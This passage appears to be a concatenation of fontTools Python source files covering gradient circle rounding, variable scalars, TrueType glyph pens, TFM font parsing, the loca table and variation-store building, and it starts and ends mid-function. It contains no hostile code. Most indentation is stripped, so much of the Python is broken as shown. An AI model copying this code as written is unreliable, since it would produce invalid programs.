# (-1.0, 0.0) if it's pointing West, etc.
uv = _unit_vector(direction)
if not uv:
return (0, 0)
result = []
for uv_component in uv:
if -_UNIT_VECTOR_THRESHOLD <= uv_component < _UNIT_VECTOR_THRESHOLD:
# unit vector component near 0: direction almost orthogonal to the
# direction of the current axis, thus keep coordinate unchanged
result.append(0)
else:
# nudge coord by +/- 1.0 in direction of unit vector
result.append(copysign(1.0, uv_component))
return tuple(result)
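# Illustrative values (not in the original source):
#   _rounding_offset((10, 1))  -> (1.0, 0)    almost parallel to +x, no y nudge
#   _rounding_offset((5, 5))   -> (1.0, 1.0)  45-degree diagonal, nudge both
#   _rounding_offset((0, 0))   -> (0, 0)      zero vector, no nudge at all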
class Circle:
def __init__(self, centre, radius):
self.centre = centre
self.radius = radius
def __repr__(self):
return f"Circle(centre={self.centre}, radius={self.radius})"
def round(self):
return Circle(_round_point(self.centre), otRound(self.radius))
def inside(self, outer_circle, tolerance=_CIRCLE_INSIDE_TOLERANCE):
dist = self.radius + hypot(*_vector_between(self.centre, outer_circle.centre))
return (
            isclose(outer_circle.radius, dist, rel_tol=tolerance)
or outer_circle.radius > dist
)
def concentric(self, other):
return self.centre == other.centre
def move(self, dx, dy):
self.centre = (self.centre[0] + dx, self.centre[1] + dy)
def round_start_circle_stable_containment(c0, r0, c1, r1):
"""Round start circle so that it stays inside/outside end circle after rounding.
The rounding of circle coordinates to integers may cause an abrupt change
    if the start circle c0 is so close to the end circle c1's perimeter that
it ends up falling outside (or inside) as a result of the rounding.
To keep the gradient unchanged, we nudge it in the right direction.
See:
https://github.com/googlefonts/colr-gradients-spec/issues/204
https://github.com/googlefonts/picosvg/issues/158
"""
start, end = Circle(c0, r0), Circle(c1, r1)
inside_before_round = start.inside(end)
round_start = start.round()
round_end = end.round()
inside_after_round = round_start.inside(round_end)
if inside_before_round == inside_after_round:
return round_start
elif inside_after_round:
# start was outside before rounding: we need to push start away from end
direction = _vector_between(round_end.centre, round_start.centre)
radius_delta = +1.0
else:
# start was inside before rounding: we need to push start towards end
direction = _vector_between(round_start.centre, round_end.centre)
radius_delta = -1.0
dx, dy = _rounding_offset(direction)
# At most 2 iterations ought to be enough to converge. Before the loop, we
# know the start circle didn't keep containment after normal rounding; thus
# we continue adjusting by -/+ 1.0 until containment is restored.
# Normal rounding can at most move each coordinates -/+0.5; in the worst case
# both the start and end circle's centres and radii will be rounded in opposite
# directions, e.g. when they move along a 45 degree diagonal:
# c0 = (1.5, 1.5) ===> (2.0, 2.0)
# r0 = 0.5 ===> 1.0
# c1 = (0.499, 0.499) ===> (0.0, 0.0)
# r1 = 2.499 ===> 2.0
# In this example, the relative distance between the circles, calculated
# as r1 - (r0 + distance(c0, c1)) is initially 0.57437 (c0 is inside c1), and
# -1.82842 after rounding (c0 is now outside c1). Nudging c0 by -1.0 on both
# x and y axes moves it towards c1 by hypot(-1.0, -1.0) = 1.41421. Two of these
# moves cover twice that distance, which is enough to restore containment.
max_attempts = 2
for _ in range(max_attempts):
if round_start.concentric(round_end):
# can't move c0 towards c1 (they are the same), so we change the radius
round_start.radius += radius_delta
assert round_start.radius >= 0
else:
round_start.move(dx, dy)
if inside_before_round == round_start.inside(round_end):
break
else: # likely a bug
raise AssertionError(
f"Rounding circle {start} "
f"{'inside' if inside_before_round else 'outside'} "
f"{end} failed after {max_attempts} attempts!"
)
return round_start
```
#### File: fontTools/feaLib/variableScalar.py
```python
from fontTools.varLib.models import VariationModel, normalizeValue
def Location(loc):
return tuple(sorted(loc.items()))
class VariableScalar:
"""A scalar with different values at different points in the designspace."""
def __init__(self, location_value={}):
self.values = {}
self.axes = {}
for location, value in location_value.items():
self.add_value(location, value)
def __repr__(self):
items = []
for location, value in self.values.items():
loc = ",".join(["%s=%i" % (ax, loc) for ax, loc in location])
items.append("%s:%i" % (loc, value))
return "(" + (" ".join(items)) + ")"
@property
def does_vary(self):
values = list(self.values.values())
return any(v != values[0] for v in values[1:])
@property
def axes_dict(self):
if not self.axes:
raise ValueError(
".axes must be defined on variable scalar before interpolating"
)
return {ax.axisTag: ax for ax in self.axes}
def _normalized_location(self, location):
location = self.fix_location(location)
normalized_location = {}
for axtag in location.keys():
if axtag not in self.axes_dict:
raise ValueError("Unknown axis %s in %s" % (axtag, location))
axis = self.axes_dict[axtag]
normalized_location[axtag] = normalizeValue(
location[axtag], (axis.minValue, axis.defaultValue, axis.maxValue)
)
return Location(normalized_location)
def fix_location(self, location):
location = dict(location)
for tag, axis in self.axes_dict.items():
if tag not in location:
location[tag] = axis.defaultValue
return location
def add_value(self, location, value):
if self.axes:
location = self.fix_location(location)
self.values[Location(location)] = value
def fix_all_locations(self):
self.values = {
Location(self.fix_location(l)): v for l, v in self.values.items()
}
@property
def default(self):
self.fix_all_locations()
key = Location({ax.axisTag: ax.defaultValue for ax in self.axes})
if key not in self.values:
raise ValueError("Default value could not be found")
# I *guess* we could interpolate one, but I don't know how.
return self.values[key]
def value_at_location(self, location):
loc = location
if loc in self.values.keys():
return self.values[loc]
values = list(self.values.values())
return self.model.interpolateFromMasters(loc, values)
@property
def model(self):
locations = [dict(self._normalized_location(k)) for k in self.values.keys()]
return VariationModel(locations)
def get_deltas_and_supports(self):
values = list(self.values.values())
return self.model.getDeltasAndSupports(values)
def add_to_variation_store(self, store_builder):
deltas, supports = self.get_deltas_and_supports()
store_builder.setSupports(supports)
index = store_builder.storeDeltas(deltas)
return int(self.default), index
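# Runnable usage sketch (the axis object is mocked with SimpleNamespace here;
# in real use it would come from the font's fvar table):
if __name__ == "__main__":
    from types import SimpleNamespace
    wght = SimpleNamespace(axisTag="wght", minValue=100, defaultValue=400, maxValue=900)
    scalar = VariableScalar()
    scalar.axes = [wght]
    scalar.add_value({"wght": 400}, 10)
    scalar.add_value({"wght": 900}, 30)
    print(scalar, "default:", scalar.default, "varies:", scalar.does_vary)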
```
#### File: fontTools/misc/cython.py
```python
from types import SimpleNamespace
def _empty_decorator(x):
return x
compiled = False
for name in ("double", "complex", "int"):
globals()[name] = None
for name in ("cfunc", "inline"):
globals()[name] = _empty_decorator
locals = lambda **_: _empty_decorator
returns = lambda _: _empty_decorator
```
#### File: otlLib/optimize/__init__.py
```python
from argparse import RawTextHelpFormatter
from textwrap import dedent
from fontTools.ttLib import TTFont
from fontTools.otlLib.optimize.gpos import compact, GPOS_COMPACT_MODE_DEFAULT
def main(args=None):
"""Optimize the layout tables of an existing font."""
from argparse import ArgumentParser
from fontTools import configLogger
parser = ArgumentParser(prog="otlLib.optimize", description=main.__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("font")
parser.add_argument(
"-o", metavar="OUTPUTFILE", dest="outfile", default=None, help="output file"
)
parser.add_argument(
"--gpos-compact-mode",
help=dedent(
f"""\
GPOS Lookup type 2 (PairPos) compaction mode:
0 = do not attempt to compact PairPos lookups;
1 to 8 = create at most 1 to 8 new subtables for each existing
subtable, provided that it would yield a 50%% file size saving;
9 = create as many new subtables as needed to yield a file size saving.
Default: {GPOS_COMPACT_MODE_DEFAULT}.
This compaction aims to save file size, by splitting large class
kerning subtables (Format 2) that contain many zero values into
smaller and denser subtables. It's a trade-off between the overhead
of several subtables versus the sparseness of one big subtable.
See the pull request: https://github.com/fonttools/fonttools/pull/2326
"""
),
default=int(GPOS_COMPACT_MODE_DEFAULT),
choices=list(range(10)),
type=int,
)
logging_group = parser.add_mutually_exclusive_group(required=False)
logging_group.add_argument(
"-v", "--verbose", action="store_true", help="Run more verbosely."
)
logging_group.add_argument(
"-q", "--quiet", action="store_true", help="Turn verbosity off."
)
options = parser.parse_args(args)
configLogger(
level=("DEBUG" if options.verbose else "ERROR" if options.quiet else "INFO")
)
font = TTFont(options.font)
# TODO: switch everything to have type(mode) = int when using the Config class
compact(font, str(options.gpos_compact_mode))
font.save(options.outfile or options.font)
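# Example invocation (font file names are placeholders):
#   main(["MyFont.ttf", "--gpos-compact-mode", "5", "-o", "MyFont.compact.ttf"])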
if __name__ == "__main__":
import sys
if len(sys.argv) > 1:
sys.exit(main())
import doctest
sys.exit(doctest.testmod().failed)
```
#### File: fontTools/pens/ttGlyphPen.py
```python
from array import array
from typing import Any, Dict, Optional, Tuple
from fontTools.misc.fixedTools import MAX_F2DOT14, floatToFixedToFloat
from fontTools.misc.loggingTools import LogMixin
from fontTools.pens.pointPen import AbstractPointPen
from fontTools.misc.roundTools import otRound
from fontTools.pens.basePen import LoggingPen, PenError
from fontTools.pens.transformPen import TransformPen, TransformPointPen
from fontTools.ttLib.tables import ttProgram
from fontTools.ttLib.tables._g_l_y_f import Glyph
from fontTools.ttLib.tables._g_l_y_f import GlyphComponent
from fontTools.ttLib.tables._g_l_y_f import GlyphCoordinates
__all__ = ["TTGlyphPen", "TTGlyphPointPen"]
class _TTGlyphBasePen:
def __init__(
self,
glyphSet: Optional[Dict[str, Any]],
handleOverflowingTransforms: bool = True,
) -> None:
"""
Construct a new pen.
Args:
glyphSet (Dict[str, Any]): A glyphset object, used to resolve components.
handleOverflowingTransforms (bool): See below.
If ``handleOverflowingTransforms`` is True, the components' transform values
are checked that they don't overflow the limits of a F2Dot14 number:
-2.0 <= v < +2.0. If any transform value exceeds these, the composite
glyph is decomposed.
An exception to this rule is done for values that are very close to +2.0
(both for consistency with the -2.0 case, and for the relative frequency
these occur in real fonts). When almost +2.0 values occur (and all other
values are within the range -2.0 <= x <= +2.0), they are clamped to the
maximum positive value that can still be encoded as an F2Dot14: i.e.
1.99993896484375.
If False, no check is done and all components are translated unmodified
into the glyf table, followed by an inevitable ``struct.error`` once an
attempt is made to compile them.
If both contours and components are present in a glyph, the components
are decomposed.
"""
self.glyphSet = glyphSet
self.handleOverflowingTransforms = handleOverflowingTransforms
self.init()
def _decompose(
self,
glyphName: str,
transformation: Tuple[float, float, float, float, float, float],
):
tpen = self.transformPen(self, transformation)
getattr(self.glyphSet[glyphName], self.drawMethod)(tpen)
def _isClosed(self):
"""
Check if the current path is closed.
"""
raise NotImplementedError
def init(self) -> None:
self.points = []
self.endPts = []
self.types = []
self.components = []
def addComponent(
self,
baseGlyphName: str,
transformation: Tuple[float, float, float, float, float, float],
identifier: Optional[str] = None,
**kwargs: Any,
) -> None:
"""
Add a sub glyph.
"""
self.components.append((baseGlyphName, transformation))
def _buildComponents(self, componentFlags):
if self.handleOverflowingTransforms:
# we can't encode transform values > 2 or < -2 in F2Dot14,
# so we must decompose the glyph if any transform exceeds these
overflowing = any(
s > 2 or s < -2
for (glyphName, transformation) in self.components
for s in transformation[:4]
)
components = []
for glyphName, transformation in self.components:
if glyphName not in self.glyphSet:
self.log.warning(f"skipped non-existing component '{glyphName}'")
continue
if self.points or (self.handleOverflowingTransforms and overflowing):
# can't have both coordinates and components, so decompose
self._decompose(glyphName, transformation)
continue
component = GlyphComponent()
component.glyphName = glyphName
component.x, component.y = (otRound(v) for v in transformation[4:])
# quantize floats to F2Dot14 so we get same values as when decompiled
# from a binary glyf table
transformation = tuple(
floatToFixedToFloat(v, 14) for v in transformation[:4]
)
if transformation != (1, 0, 0, 1):
if self.handleOverflowingTransforms and any(
MAX_F2DOT14 < s <= 2 for s in transformation
):
# clamp values ~= +2.0 so we can keep the component
transformation = tuple(
MAX_F2DOT14 if MAX_F2DOT14 < s <= 2 else s
for s in transformation
)
component.transform = (transformation[:2], transformation[2:])
component.flags = componentFlags
components.append(component)
return components
def glyph(self, componentFlags: int = 0x4) -> Glyph:
"""
Returns a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
if not self._isClosed():
raise PenError("Didn't close last contour.")
components = self._buildComponents(componentFlags)
glyph = Glyph()
glyph.coordinates = GlyphCoordinates(self.points)
glyph.coordinates.toInt()
glyph.endPtsOfContours = self.endPts
glyph.flags = array("B", self.types)
self.init()
if components:
# If both components and contours were present, they have by now
# been decomposed by _buildComponents.
glyph.components = components
glyph.numberOfContours = -1
else:
glyph.numberOfContours = len(glyph.endPtsOfContours)
glyph.program = ttProgram.Program()
glyph.program.fromBytecode(b"")
return glyph
class TTGlyphPen(_TTGlyphBasePen, LoggingPen):
"""
Pen used for drawing to a TrueType glyph.
This pen can be used to construct or modify glyphs in a TrueType format
font. After using the pen to draw, use the ``.glyph()`` method to retrieve
a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
drawMethod = "draw"
transformPen = TransformPen
def _addPoint(self, pt: Tuple[float, float], onCurve: int) -> None:
self.points.append(pt)
self.types.append(onCurve)
def _popPoint(self) -> None:
self.points.pop()
self.types.pop()
def _isClosed(self) -> bool:
return (not self.points) or (
self.endPts and self.endPts[-1] == len(self.points) - 1
)
def lineTo(self, pt: Tuple[float, float]) -> None:
self._addPoint(pt, 1)
def moveTo(self, pt: Tuple[float, float]) -> None:
if not self._isClosed():
raise PenError('"move"-type point must begin a new contour.')
self._addPoint(pt, 1)
def curveTo(self, *points) -> None:
raise NotImplementedError
def qCurveTo(self, *points) -> None:
assert len(points) >= 1
for pt in points[:-1]:
self._addPoint(pt, 0)
# last point is None if there are no on-curve points
if points[-1] is not None:
self._addPoint(points[-1], 1)
def closePath(self) -> None:
endPt = len(self.points) - 1
# ignore anchors (one-point paths)
if endPt == 0 or (self.endPts and endPt == self.endPts[-1] + 1):
self._popPoint()
return
# if first and last point on this path are the same, remove last
startPt = 0
if self.endPts:
startPt = self.endPts[-1] + 1
if self.points[startPt] == self.points[endPt]:
self._popPoint()
endPt -= 1
self.endPts.append(endPt)
def endPath(self) -> None:
# TrueType contours are always "closed"
self.closePath()
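# Usage sketch (illustrative, not part of the library source): draw a simple
# triangle and build a glyf-table glyph from it.
#
#   pen = TTGlyphPen(glyphSet=None)
#   pen.moveTo((0, 0))
#   pen.lineTo((0, 500))
#   pen.lineTo((400, 0))
#   pen.closePath()
#   glyph = pen.glyph()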
class TTGlyphPointPen(_TTGlyphBasePen, LogMixin, AbstractPointPen):
"""
Point pen used for drawing to a TrueType glyph.
This pen can be used to construct or modify glyphs in a TrueType format
font. After using the pen to draw, use the ``.glyph()`` method to retrieve
a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
drawMethod = "drawPoints"
transformPen = TransformPointPen
def init(self) -> None:
super().init()
self._currentContourStartIndex = None
def _isClosed(self) -> bool:
return self._currentContourStartIndex is None
def beginPath(self, identifier: Optional[str] = None, **kwargs: Any) -> None:
"""
Start a new sub path.
"""
if not self._isClosed():
raise PenError("Didn't close previous contour.")
self._currentContourStartIndex = len(self.points)
def endPath(self) -> None:
"""
End the current sub path.
"""
# TrueType contours are always "closed"
if self._isClosed():
raise PenError("Contour is already closed.")
if self._currentContourStartIndex == len(self.points):
raise PenError("Tried to end an empty contour.")
self.endPts.append(len(self.points) - 1)
self._currentContourStartIndex = None
def addPoint(
self,
pt: Tuple[float, float],
segmentType: Optional[str] = None,
smooth: bool = False,
name: Optional[str] = None,
identifier: Optional[str] = None,
**kwargs: Any,
) -> None:
"""
Add a point to the current sub path.
"""
if self._isClosed():
raise PenError("Can't add a point to a closed contour.")
if segmentType is None:
self.types.append(0) # offcurve
elif segmentType in ("qcurve", "line", "move"):
self.types.append(1) # oncurve
elif segmentType == "curve":
raise NotImplementedError("cubic curves are not supported")
else:
raise AssertionError(segmentType)
self.points.append(pt)
```
#### File: site-packages/fontTools/tfmLib.py
```python
from types import SimpleNamespace
from fontTools.misc.sstruct import calcsize, unpack, unpack2
SIZES_FORMAT = """
>
lf: h # length of the entire file, in words
lh: h # length of the header data, in words
bc: h # smallest character code in the font
ec: h # largest character code in the font
nw: h # number of words in the width table
nh: h # number of words in the height table
nd: h # number of words in the depth table
ni: h # number of words in the italic correction table
nl: h # number of words in the ligature/kern table
nk: h # number of words in the kern table
ne: h # number of words in the extensible character table
np: h # number of font parameter words
"""
SIZES_SIZE = calcsize(SIZES_FORMAT)
FIXED_FORMAT = "12.20F"
HEADER_FORMAT1 = f"""
>
checksum: L
designsize: {FIXED_FORMAT}
"""
HEADER_FORMAT2 = f"""
{HEADER_FORMAT1}
codingscheme: 40p
"""
HEADER_FORMAT3 = f"""
{HEADER_FORMAT2}
family: 20p
"""
HEADER_FORMAT4 = f"""
{HEADER_FORMAT3}
seven_bit_safe_flag: ?
ignored: x
ignored: x
face: B
"""
HEADER_SIZE1 = calcsize(HEADER_FORMAT1)
HEADER_SIZE2 = calcsize(HEADER_FORMAT2)
HEADER_SIZE3 = calcsize(HEADER_FORMAT3)
HEADER_SIZE4 = calcsize(HEADER_FORMAT4)
LIG_KERN_COMMAND = """
>
skip_byte: B
next_char: B
op_byte: B
remainder: B
"""
BASE_PARAMS = [
"SLANT",
"SPACE",
"STRETCH",
"SHRINK",
"XHEIGHT",
"QUAD",
"EXTRASPACE",
]
MATHSY_PARAMS = [
"NUM1",
"NUM2",
"NUM3",
"DENOM1",
"DENOM2",
"SUP1",
"SUP2",
"SUP3",
"SUB1",
"SUB2",
"SUPDROP",
"SUBDROP",
"DELIM1",
"DELIM2",
"AXISHEIGHT",
]
MATHEX_PARAMS = [
"DEFAULTRULETHICKNESS",
"BIGOPSPACING1",
"BIGOPSPACING2",
"BIGOPSPACING3",
"BIGOPSPACING4",
"BIGOPSPACING5",
]
VANILLA = 0
MATHSY = 1
MATHEX = 2
UNREACHABLE = 0
PASSTHROUGH = 1
ACCESSABLE = 2
NO_TAG = 0
LIG_TAG = 1
LIST_TAG = 2
EXT_TAG = 3
STOP_FLAG = 128
KERN_FLAG = 128
class TFMException(Exception):
def __init__(self, message):
super().__init__(message)
class TFM:
def __init__(self, file):
self._read(file)
def __repr__(self):
return (
f"<TFM"
f" for {self.family}"
f" in {self.codingscheme}"
f" at {self.designsize:g}pt>"
)
def _read(self, file):
if hasattr(file, "read"):
data = file.read()
else:
with open(file, "rb") as fp:
data = fp.read()
self._data = data
if len(data) < SIZES_SIZE:
raise TFMException("Too short input file")
sizes = SimpleNamespace()
unpack2(SIZES_FORMAT, data, sizes)
# Do some file structure sanity checks.
# TeX and TFtoPL do additional functional checks and might even correct
# “errors” in the input file, but we instead try to output the file as
# it is as long as it is parsable, even if the data make no sense.
if sizes.lf < 0:
raise TFMException("The file claims to have negative or zero length!")
if len(data) < sizes.lf * 4:
raise TFMException("The file has fewer bytes than it claims!")
for name, length in vars(sizes).items():
if length < 0:
raise TFMException("The subfile size: '{name}' is negative!")
if sizes.lh < 2:
raise TFMException(f"The header length is only {sizes.lh}!")
if sizes.bc > sizes.ec + 1 or sizes.ec > 255:
raise TFMException(
f"The character code range {sizes.bc}..{sizes.ec} is illegal!"
)
if sizes.nw == 0 or sizes.nh == 0 or sizes.nd == 0 or sizes.ni == 0:
raise TFMException("Incomplete subfiles for character dimensions!")
if sizes.ne > 256:
raise TFMException(f"There are {ne} extensible recipes!")
if sizes.lf != (
6
+ sizes.lh
+ (sizes.ec - sizes.bc + 1)
+ sizes.nw
+ sizes.nh
+ sizes.nd
+ sizes.ni
+ sizes.nl
+ sizes.nk
+ sizes.ne
+ sizes.np
):
raise TFMException("Subfile sizes don’t add up to the stated total")
# Subfile offsets, used in the helper function below. These all are
# 32-bit word offsets not 8-bit byte offsets.
char_base = 6 + sizes.lh - sizes.bc
width_base = char_base + sizes.ec + 1
height_base = width_base + sizes.nw
depth_base = height_base + sizes.nh
italic_base = depth_base + sizes.nd
lig_kern_base = italic_base + sizes.ni
kern_base = lig_kern_base + sizes.nl
exten_base = kern_base + sizes.nk
param_base = exten_base + sizes.ne
# Helper functions for accessing individual data. If this looks
# nonidiomatic Python, I blame the effect of reading the literate WEB
# documentation of TFtoPL.
def char_info(c):
return 4 * (char_base + c)
def width_index(c):
return data[char_info(c)]
def noneexistent(c):
return c < sizes.bc or c > sizes.ec or width_index(c) == 0
def height_index(c):
return data[char_info(c) + 1] // 16
def depth_index(c):
return data[char_info(c) + 1] % 16
def italic_index(c):
return data[char_info(c) + 2] // 4
def tag(c):
return data[char_info(c) + 2] % 4
def remainder(c):
return data[char_info(c) + 3]
def width(c):
r = 4 * (width_base + width_index(c))
return read_fixed(r, "v")["v"]
def height(c):
r = 4 * (height_base + height_index(c))
return read_fixed(r, "v")["v"]
def depth(c):
r = 4 * (depth_base + depth_index(c))
return read_fixed(r, "v")["v"]
def italic(c):
r = 4 * (italic_base + italic_index(c))
return read_fixed(r, "v")["v"]
def exten(c):
return 4 * (exten_base + remainder(c))
def lig_step(i):
return 4 * (lig_kern_base + i)
def lig_kern_command(i):
command = SimpleNamespace()
unpack2(LIG_KERN_COMMAND, data[i:], command)
return command
def kern(i):
r = 4 * (kern_base + i)
return read_fixed(r, "v")["v"]
def param(i):
return 4 * (param_base + i)
def read_fixed(index, key, obj=None):
ret = unpack2(f">;{key}:{FIXED_FORMAT}", data[index:], obj)
return ret[0]
# Set all attributes to empty values regardless of the header size.
unpack(HEADER_FORMAT4, [0] * HEADER_SIZE4, self)
offset = 24
length = sizes.lh * 4
self.extraheader = {}
if length >= HEADER_SIZE4:
rest = unpack2(HEADER_FORMAT4, data[offset:], self)[1]
if self.face < 18:
s = self.face % 2
b = self.face // 2
self.face = "MBL"[b % 3] + "RI"[s] + "RCE"[b // 3]
for i in range(sizes.lh - HEADER_SIZE4 // 4):
rest = unpack2(f">;HEADER{i + 18}:l", rest, self.extraheader)[1]
elif length >= HEADER_SIZE3:
unpack2(HEADER_FORMAT3, data[offset:], self)
elif length >= HEADER_SIZE2:
unpack2(HEADER_FORMAT2, data[offset:], self)
elif length >= HEADER_SIZE1:
unpack2(HEADER_FORMAT1, data[offset:], self)
self.fonttype = VANILLA
scheme = self.codingscheme.upper()
if scheme.startswith("TEX MATH SY"):
self.fonttype = MATHSY
elif scheme.startswith("TEX MATH EX"):
self.fonttype = MATHEX
self.fontdimens = {}
for i in range(sizes.np):
name = f"PARAMETER{i+1}"
if i <= 6:
name = BASE_PARAMS[i]
elif self.fonttype == MATHSY and i <= 21:
name = MATHSY_PARAMS[i - 7]
elif self.fonttype == MATHEX and i <= 12:
name = MATHEX_PARAMS[i - 7]
read_fixed(param(i), name, self.fontdimens)
lig_kern_map = {}
self.right_boundary_char = None
self.left_boundary_char = None
if sizes.nl > 0:
cmd = lig_kern_command(lig_step(0))
if cmd.skip_byte == 255:
self.right_boundary_char = cmd.next_char
cmd = lig_kern_command(lig_step((sizes.nl - 1)))
if cmd.skip_byte == 255:
self.left_boundary_char = 256
r = 256 * cmd.op_byte + cmd.remainder
lig_kern_map[self.left_boundary_char] = r
self.chars = {}
for c in range(sizes.bc, sizes.ec + 1):
if width_index(c) > 0:
self.chars[c] = info = {}
info["width"] = width(c)
if height_index(c) > 0:
info["height"] = height(c)
if depth_index(c) > 0:
info["depth"] = depth(c)
if italic_index(c) > 0:
info["italic"] = italic(c)
char_tag = tag(c)
if char_tag == NO_TAG:
pass
elif char_tag == LIG_TAG:
lig_kern_map[c] = remainder(c)
elif char_tag == LIST_TAG:
info["nextlarger"] = remainder(c)
elif char_tag == EXT_TAG:
info["varchar"] = varchar = {}
for i in range(4):
part = data[exten(c) + i]
if i == 3 or part > 0:
name = "rep"
if i == 0:
name = "top"
elif i == 1:
name = "mid"
elif i == 2:
name = "bot"
if noneexistent(part):
varchar[name] = c
else:
varchar[name] = part
self.ligatures = {}
self.kerning = {}
for c, i in sorted(lig_kern_map.items()):
cmd = lig_kern_command(lig_step(i))
if cmd.skip_byte > STOP_FLAG:
i = 256 * cmd.op_byte + cmd.remainder
while i < sizes.nl:
cmd = lig_kern_command(lig_step(i))
if cmd.skip_byte > STOP_FLAG:
pass
else:
if cmd.op_byte >= KERN_FLAG:
r = 256 * (cmd.op_byte - KERN_FLAG) + cmd.remainder
self.kerning.setdefault(c, {})[cmd.next_char] = kern(r)
else:
r = cmd.op_byte
if r == 4 or (r > 7 and r != 11):
# Ligature step with nonstandard code, we output
# the code verbatim.
lig = r
else:
lig = ""
if r % 4 > 1:
lig += "/"
lig += "LIG"
if r % 2 != 0:
lig += "/"
while r > 3:
lig += ">"
r -= 4
self.ligatures.setdefault(c, {})[cmd.next_char] = (
lig,
cmd.remainder,
)
if cmd.skip_byte >= STOP_FLAG:
break
i += cmd.skip_byte + 1
if __name__ == "__main__":
import sys
tfm = TFM(sys.argv[1])
print(
"\n".join(
x
for x in [
f"tfm.checksum={tfm.checksum}",
f"tfm.designsize={tfm.designsize}",
f"tfm.codingscheme={tfm.codingscheme}",
f"tfm.fonttype={tfm.fonttype}",
f"tfm.family={tfm.family}",
f"tfm.seven_bit_safe_flag={tfm.seven_bit_safe_flag}",
f"tfm.face={tfm.face}",
f"tfm.extraheader={tfm.extraheader}",
f"tfm.fontdimens={tfm.fontdimens}",
f"tfm.right_boundary_char={tfm.right_boundary_char}",
f"tfm.left_boundary_char={tfm.left_boundary_char}",
f"tfm.kerning={tfm.kerning}",
f"tfm.ligatures={tfm.ligatures}",
f"tfm.chars={tfm.chars}",
]
)
)
print(tfm)
```
#### File: ttLib/tables/BitmapGlyphMetrics.py
```python
from fontTools.misc import sstruct
from fontTools.misc.textTools import safeEval
import logging
log = logging.getLogger(__name__)
bigGlyphMetricsFormat = """
> # big endian
height: B
width: B
horiBearingX: b
horiBearingY: b
horiAdvance: B
vertBearingX: b
vertBearingY: b
vertAdvance: B
"""
smallGlyphMetricsFormat = """
> # big endian
height: B
width: B
BearingX: b
BearingY: b
Advance: B
"""
class BitmapGlyphMetrics(object):
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__)
writer.newline()
for metricName in sstruct.getformat(self.__class__.binaryFormat)[1]:
writer.simpletag(metricName, value=getattr(self, metricName))
writer.newline()
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
metricNames = set(sstruct.getformat(self.__class__.binaryFormat)[1])
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
# Make sure this is a metric that is needed by GlyphMetrics.
if name in metricNames:
vars(self)[name] = safeEval(attrs['value'])
else:
log.warning("unknown name '%s' being ignored in %s.", name, self.__class__.__name__)
class BigGlyphMetrics(BitmapGlyphMetrics):
binaryFormat = bigGlyphMetricsFormat
class SmallGlyphMetrics(BitmapGlyphMetrics):
binaryFormat = smallGlyphMetricsFormat
```
#### File: ttLib/tables/_l_o_c_a.py
```python
from . import DefaultTable
import sys
import array
import logging
log = logging.getLogger(__name__)
class table__l_o_c_a(DefaultTable.DefaultTable):
dependencies = ['glyf']
def decompile(self, data, ttFont):
longFormat = ttFont['head'].indexToLocFormat
if longFormat:
format = "I"
else:
format = "H"
locations = array.array(format)
locations.frombytes(data)
if sys.byteorder != "big": locations.byteswap()
if not longFormat:
l = array.array("I")
for i in range(len(locations)):
l.append(locations[i] * 2)
locations = l
if len(locations) < (ttFont['maxp'].numGlyphs + 1):
log.warning("corrupt 'loca' table, or wrong numGlyphs in 'maxp': %d %d",
len(locations) - 1, ttFont['maxp'].numGlyphs)
self.locations = locations
def compile(self, ttFont):
try:
max_location = max(self.locations)
except AttributeError:
self.set([])
max_location = 0
if max_location < 0x20000 and all(l % 2 == 0 for l in self.locations):
locations = array.array("H")
for i in range(len(self.locations)):
locations.append(self.locations[i] // 2)
ttFont['head'].indexToLocFormat = 0
else:
locations = array.array("I", self.locations)
ttFont['head'].indexToLocFormat = 1
if sys.byteorder != "big": locations.byteswap()
return locations.tobytes()
def set(self, locations):
self.locations = array.array("I", locations)
def toXML(self, writer, ttFont):
writer.comment("The 'loca' table will be calculated by the compiler")
writer.newline()
def __getitem__(self, index):
return self.locations[index]
def __len__(self):
return len(self.locations)
```
#### File: fontTools/varLib/builder.py
```python
from fontTools import ttLib
from fontTools.ttLib.tables import otTables as ot
# VariationStore
def buildVarRegionAxis(axisSupport):
self = ot.VarRegionAxis()
self.StartCoord, self.PeakCoord, self.EndCoord = [float(v) for v in axisSupport]
return self
def buildVarRegion(support, axisTags):
assert all(tag in axisTags for tag in support.keys()), ("Unknown axis tag found.", support, axisTags)
self = ot.VarRegion()
self.VarRegionAxis = []
for tag in axisTags:
self.VarRegionAxis.append(buildVarRegionAxis(support.get(tag, (0,0,0))))
return self
def buildVarRegionList(supports, axisTags):
self = ot.VarRegionList()
self.RegionAxisCount = len(axisTags)
self.Region = []
for support in supports:
self.Region.append(buildVarRegion(support, axisTags))
self.RegionCount = len(self.Region)
return self
def _reorderItem(lst, mapping):
return [lst[i] for i in mapping]
def VarData_calculateNumShorts(self, optimize=False):
count = self.VarRegionCount
items = self.Item
bit_lengths = [0] * count
for item in items:
# The "+ (i < -1)" magic is to handle two's-compliment.
# That is, we want to get back 7 for -128, whereas
# bit_length() returns 8. Similarly for -65536.
# The reason "i < -1" is used instead of "i < 0" is that
# the latter would make it return 0 for "-1" instead of 1.
bl = [(i + (i < -1)).bit_length() for i in item]
bit_lengths = [max(*pair) for pair in zip(bl, bit_lengths)]
# The addition of 8, instead of seven, is to account for the sign bit.
# This "((b + 8) >> 3) if b else 0" when combined with the above
# "(i + (i < -1)).bit_length()" is a faster way to compute byte-lengths
# conforming to:
#
# byte_length = (0 if i == 0 else
# 1 if -128 <= i < 128 else
# 2 if -65536 <= i < 65536 else
# ...)
byte_lengths = [((b + 8) >> 3) if b else 0 for b in bit_lengths]
# https://github.com/fonttools/fonttools/issues/2279
longWords = any(b > 2 for b in byte_lengths)
if optimize:
# Reorder columns such that wider columns come before narrower columns
mapping = []
mapping.extend(i for i,b in enumerate(byte_lengths) if b > 2)
mapping.extend(i for i,b in enumerate(byte_lengths) if b == 2)
mapping.extend(i for i,b in enumerate(byte_lengths) if b == 1)
byte_lengths = _reorderItem(byte_lengths, mapping)
self.VarRegionIndex = _reorderItem(self.VarRegionIndex, mapping)
self.VarRegionCount = len(self.VarRegionIndex)
for i in range(len(items)):
items[i] = _reorderItem(items[i], mapping)
if longWords:
